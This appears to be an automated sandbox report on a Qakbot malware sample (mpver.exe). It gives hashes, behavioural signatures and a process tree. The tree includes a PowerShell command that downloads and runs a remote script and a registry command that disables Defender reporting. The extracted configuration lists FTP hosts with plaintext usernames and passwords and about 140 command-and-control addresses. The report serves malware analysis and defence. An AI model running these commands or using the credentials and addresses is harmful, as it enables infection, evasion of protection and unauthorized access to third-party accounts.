Analysis
-
max time kernel
13s -
max time network
127s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
19-07-2021 20:56
Static task
static1
Behavioral task
behavioral1
Sample
mpver.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
mpver.exe
Resource
win10v20210410
General
-
Target
mpver.exe
-
Size
36.5MB
-
MD5
07a25e7f4f3a756e64c07c07d82591a4
-
SHA1
ff3f1f7e82d1721fa0d28cad127bca6d799f40b8
-
SHA256
6f5d3879c4a516661a93499e64d7595333fb51d6a87677de25d9b7a19b41b362
-
SHA512
efd1acbc61603c810b5048d5f71cfaddba3430ecf49e6a815f76b7ffa9fc48a91e1d371986199569bc15cd8051d0a67c24e8d6c6c3303ffcac0448395233b5d4
Malware Config
Extracted
https://www.allens-treasure-house.com/books_files/001.ps1
Extracted
qakbot
322.109
1515090054
Protocol: ftp- Host:
66.96.133.9 - Port:
21 - Username:
help - Password:
eT5TerAcnFe6~
Protocol: ftp- Host:
174.123.38.58 - Port:
21 - Username:
log@thebrainregistry.com - Password:
4BQ1MeeRAwNZEVu
Protocol: ftp- Host:
61.221.12.26 - Port:
21 - Username:
logger@ostergift.com - Password:
346HZGCMlwecz9S
Protocol: ftp- Host:
67.222.137.18 - Port:
21 - Username:
logger@grupocrepusculo.net - Password:
p4a8k6fE1FtA3pR
Protocol: ftp- Host:
107.6.152.61 - Port:
21 - Username:
logger@trussedup.com - Password:
RoP4Af0RKAAQ74V
151.202.46.113:443
108.58.129.90:995
96.85.138.153:443
108.35.21.79:443
68.83.130.163:443
75.83.30.135:443
216.201.159.118:443
76.98.128.87:443
65.73.215.139:990
50.195.161.2:995
216.187.170.2:443
74.93.207.181:993
75.97.144.106:995
73.186.100.187:443
86.27.41.234:443
96.70.92.177:465
68.173.55.51:443
165.225.38.208:443
71.190.202.120:443
117.195.250.175:443
108.49.159.2:993
47.37.99.212:995
50.44.183.216:443
108.49.159.2:990
173.72.96.50:443
65.218.249.250:443
174.70.133.56:995
70.118.18.242:443
173.72.96.50:995
96.85.138.153:6881
66.189.228.49:995
67.247.220.195:443
96.91.53.117:443
76.179.72.219:443
47.223.78.244:993
136.61.161.102:443
206.169.107.58:995
96.70.92.177:993
209.212.131.66:443
73.198.142.130:995
76.188.197.130:443
50.42.189.206:993
24.119.224.202:2222
189.155.215.219:995
108.49.159.2:995
189.155.215.219:993
173.247.186.90:2222
23.240.50.137:443
47.22.21.180:995
107.184.242.19:443
96.85.138.153:995
216.51.79.71:443
66.76.136.65:1194
100.35.65.82:995
98.102.37.174:2222
151.181.38.50:6881
70.95.129.59:443
62.113.27.30:443
38.101.195.44:443
66.222.48.40:443
73.250.49.41:443
88.238.150.110:995
85.100.134.140:995
98.191.134.121:443
104.159.220.171:443
41.40.59.182:443
97.89.112.190:443
50.198.141.161:2222
105.186.189.149:443
63.154.103.30:995
27.3.93.3:443
118.174.161.47:995
75.189.247.81:443
73.211.20.57:443
72.20.132.2:443
71.85.72.9:443
75.110.246.15:443
216.251.203.253:443
73.77.96.186:443
73.255.36.173:443
98.220.248.132:443
69.118.17.150:995
67.165.82.207:443
24.187.255.116:443
76.64.116.148:2222
70.88.214.41:443
41.142.143.68:443
76.189.128.63:443
98.196.247.150:443
24.243.42.72:443
24.45.230.32:443
12.166.108.82:995
174.81.187.84:443
98.26.2.182:443
24.14.39.10:443
173.185.75.235:995
151.202.46.113:995
174.231.135.91:443
65.33.119.17:443
172.87.188.2:443
52.119.82.82:2222
174.44.157.249:2222
96.29.42.70:443
172.75.241.225:995
50.206.74.2:443
40.138.12.210:443
66.76.136.65:443
71.28.5.188:443
64.40.70.150:443
73.183.141.219:443
24.255.118.75:443
216.228.55.13:443
216.15.14.104:443
198.57.88.73:443
73.163.155.82:443
71.12.171.133:995
73.211.72.58:443
65.92.11.213:2222
174.194.13.181:443
208.102.147.26:443
73.171.208.223:443
184.155.19.94:2222
73.210.183.3:443
173.49.95.92:443
47.223.166.146:443
24.163.66.146:443
70.57.122.178:443
70.189.67.15:443
88.224.109.128:443
12.45.162.90:2078
176.232.73.217:443
76.95.241.114:443
73.8.165.2:443
24.224.117.142:2222
98.121.199.219:443
205.201.144.27:443
71.245.117.42:32102
70.100.0.90:443
156.199.175.72:443
165.138.13.253:995
206.246.140.25:6882
75.150.236.59:443
50.76.117.233:2083
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 12 4084 powershell.exe -
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 2168 4084 WerFault.exe powershell.exe -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
mpver.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 mpver.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc mpver.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Service mpver.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 mpver.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc mpver.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Service mpver.exe -
Suspicious behavior: EnumeratesProcesses 24 IoCs
Processes:
mpver.exempver.exepowershell.exeWerFault.exepid process 3904 mpver.exe 3904 mpver.exe 4040 mpver.exe 4040 mpver.exe 4040 mpver.exe 4040 mpver.exe 4084 powershell.exe 4084 powershell.exe 4084 powershell.exe 2168 WerFault.exe 2168 WerFault.exe 2168 WerFault.exe 2168 WerFault.exe 2168 WerFault.exe 2168 WerFault.exe 2168 WerFault.exe 2168 WerFault.exe 2168 WerFault.exe 2168 WerFault.exe 2168 WerFault.exe 2168 WerFault.exe 2168 WerFault.exe 2168 WerFault.exe 2168 WerFault.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exeWerFault.exedescription pid process Token: SeDebugPrivilege 4084 powershell.exe Token: SeDebugPrivilege 2168 WerFault.exe -
Suspicious use of WriteProcessMemory 7 IoCs
Processes:
mpver.exedescription pid process target process PID 3904 wrote to memory of 4040 3904 mpver.exe mpver.exe PID 3904 wrote to memory of 4040 3904 mpver.exe mpver.exe PID 3904 wrote to memory of 4040 3904 mpver.exe mpver.exe PID 3904 wrote to memory of 3364 3904 mpver.exe reg.exe PID 3904 wrote to memory of 3364 3904 mpver.exe reg.exe PID 3904 wrote to memory of 4084 3904 mpver.exe powershell.exe PID 3904 wrote to memory of 4084 3904 mpver.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\mpver.exe"C:\Users\Admin\AppData\Local\Temp\mpver.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\mpver.exe"C:\Users\Admin\AppData\Local\Temp\mpver.exe" /C2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet" /f /t REG_DWORD /v "SpyNetReporting" /d "0"2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://www.allens-treasure-house.com/books_files/001.ps1'); Invoke-MainWorker -Command 'C:\Users\Admin\AppData\Local\Temp\gnnrhsjzilwzjqlfvytgevnba.txt'"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4084 -s 24843⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/3364-121-0x0000000000000000-mapping.dmp
-
memory/3904-114-0x0000000001000000-0x0000000001084000-memory.dmpFilesize
528KB
-
memory/3904-116-0x0000000000400000-0x00000000004AE000-memory.dmpFilesize
696KB
-
memory/4040-117-0x0000000000000000-mapping.dmp
-
memory/4040-120-0x0000000000460000-0x0000000000466000-memory.dmpFilesize
24KB
-
memory/4084-122-0x0000000000000000-mapping.dmp
-
memory/4084-128-0x00000261906A0000-0x00000261906A1000-memory.dmpFilesize
4KB
-
memory/4084-133-0x00000261A8D80000-0x00000261A8D82000-memory.dmpFilesize
8KB
-
memory/4084-134-0x00000261AAE60000-0x00000261AAE61000-memory.dmpFilesize
4KB
-
memory/4084-135-0x00000261A8D83000-0x00000261A8D85000-memory.dmpFilesize
8KB
-
memory/4084-140-0x00000261A8D86000-0x00000261A8D88000-memory.dmpFilesize
8KB